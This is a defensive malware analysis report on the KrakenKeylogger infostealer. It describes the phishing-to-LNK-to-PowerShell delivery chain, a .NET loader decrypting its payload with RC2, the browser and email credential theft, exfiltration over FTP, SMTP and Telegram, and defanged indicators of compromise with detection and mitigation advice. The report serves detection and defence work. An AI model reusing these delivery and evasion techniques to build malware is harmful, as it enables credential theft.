Full Report
Part 1 of analyzing the KrakenKeylogger Malware
Analysis Summary
# Tool/Technique: KrakenKeylogger
## Overview
KrakenKeylogger is a newly observed malware family primarily functioning as an infostealer and keylogger, delivered through a multi-stage phishing attack chain involving obfuscated PowerShell scripts and a staged .NET loader.
## Technical Details
- Type: Malware family (Stealer/Keylogger)
- Platform: Windows
- Capabilities: Phishing delivery, LNK execution, PowerShell exploitation, multi-stage payload loading (.NET executable loading a DLL), credential harvesting (browsers, email clients, FTP clients), keylogging, screenshot capture, exfiltration (FTP, SMTP, Telegram Bot).
- First Seen: Recent campaign detailed in the article (Specific date not provided beyond "recent").
## MITRE ATT&CK Mapping
Based on inferred delivery and execution:
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Implied by archive delivery)
- **TA0002 - Execution**
- T1204.002 - User Execution: Malicious File (LNK execution)
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (PowerShell deobfuscation, .NET resource decryption)
- **TA0007 - Credential Access**
- T1003 - OS Credential Dumping (Implied by credential harvesting)
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel (Using FTP/SMTP/Telegram for exfiltration)
- **TA0003 - Persistence** (Implied by post-exfiltration keylogging/screenshotting)
## Functionality
### Core Capabilities
- **Initial Stage Delivery:** Delivered via a `.zip` archive containing a `.lnk` shortcut file.
- **LNK Execution:** The `.lnk` file executes `PowerShell.exe` with arguments designed to run a highly obfuscated initial PowerShell script.
- **Payload Staging (Stage 1):** The initial PowerShell script deobfuscates a URL, downloads a second-stage payload (an HTA file) from an obfuscated URL, which subsequently downloads a final executable (`se1.exe`).
- **.NET Loader (Stage 1):** `se1.exe` is a .NET executable that decrypts an embedded resource (`DataBasePracticalJob`) using RC2 encryption, keyed by the MD5 hash of a hardcoded string.
- **DLL Loading (Stage 2):** The decrypted data reveals a second-stage .NET DLL, which is invoked via its first public exported method.
- **Information Stealing:** The malware harvests email credentials (Outlook, Foxmail, ThunderBird) and browser credentials from numerous browsers (Chrome, Firefox, Opera, Edge, Vivaldi, Brave, etc.).
- **Post-Exfiltration Activity:** After stealing data, the malware initiates continuous keylogging and screenshot capturing.
### Advanced Features
- **Multi-Layered PowerShell Obfuscation:** Utilizes complex string reversal and character manipulation functions to hide the initial download URL.
- **Custom .NET Decryption:** Employs RC2 coupled with a unique key derivation method (MD5 hash of a string encoded as BigEndianUnicode with null byte suffixing).
- **Broad Credential Harvesting:** Supports credential harvesting across a vast array of common email clients and web browsers.
- **Flexible Exfiltration:** Supports exfiltration over FTP, SMTP, and Telegram Bot channels.
## Indicators of Compromise
- File Hashes:
- Initial ZIP: `79571f0ad832a31a1121f7c698496de7e4700271ccf0a7ed7fe817688528a953`
- LNK file (`seedof.lnk`): `beec3ec08fba224c161464ebcc64727912c6678dd452596440809ce99c8390fd`
- Stage 1 Executable (`1st.exe`): `dddaf7dfb95c12acaae7de2673becf94fb9cfa7c2d83413db1ab52a5d9108b79`
- Stage 2 DLL (`2nd.dll`): `f7c66ce4c357c3a7c44dda121f8bb6a62bb3e0bc6f481619b7b5ad83855d628b`
- Stage 3 DLL (`3rd.dll`): `43e79df88e86f344180041d4a4c9381cc69a8ddb46315afd5c4c3ad9e6268e17`
- Final Payload (`Kraken.exe`): `ee76fec4bc7ec334cc6323ad156ea961e27b75eaa7efb4e88212b81e65673000`
- File Names: `Doc signed Subcontract Agreement.zip`, `seedof.lnk`, `se1.hta`, files saved potentially in `%APPDATA%`.
- Registry Keys: Not specified.
- Network Indicators:
- Initial download URL (deobfuscated): `hxxps://masherofmasters[.]cyou/chin/se1.hta`
- Second stage download URL (embedded in .hta): `hxxps://masherofmasters[.]cyou/chin/se1.exe`
- Behavioral Indicators: Execution of `powershell.exe` with extensive arguments, creation of files in `%APPDATA%`, use of `wget` (implied via PowerShell command), process execution of `.exe` followed by loading a `.dll` in memory, keylogging activity, and network connection initiation for exfiltration via FTP/SMTP/Telegram.
## Associated Threat Actors
- Not explicitly named, but leveraging common phishing/malspam delivery vectors typical of financially motivated threat groups.
## Detection Methods
- Signature-based detection: Use provided file hashes.
- Behavioral detection: Monitor for complex, multi-stage PowerShell execution chains involving string reversal/deobfuscation, dynamic file downloads to `%APPDATA%`, and .NET assembly loading in memory.
- YARA rules: Likely possible based on RC2 decryption algorithm usage and hardcoded strings/offsets within the .NET stages.
## Mitigation Strategies
- **Email Security:** Implement strict email filtering to block `.zip` attachments or archive contents containing LNK files.
- **PowerShell Execution Policy:** Restrict or heavily monitor PowerShell usage, particularly execution from user contexts or scripts downloaded from the internet.
- **Endpoint Detection and Response (EDR):** Configure rules to detect attempts to execute LNK files that spawn shells, or detect suspicious use of `wget`/PowerShell command lines indicating payload retrieval.
- **Application Control:** Restrict execution of unknown binaries downloaded dynamically to user-writable locations like `%APPDATA%`.
- **Browser Security:** Ensure browser security features are active and users are trained against credential harvesting attempts.
## Related Tools/Techniques
- **LECmd:** Used by the analyst to inspect the LNK file structure.
- **Obfuscated PowerShell:** Standard technique used by numerous malware families to bypass static analysis.
- **In-Memory .NET Loading:** Common evasion technique, often used by stealer/RAT payloads to execute subsequent stages without writing them directly to disk (though this stage writes `se1.exe` and the subsequent DLL).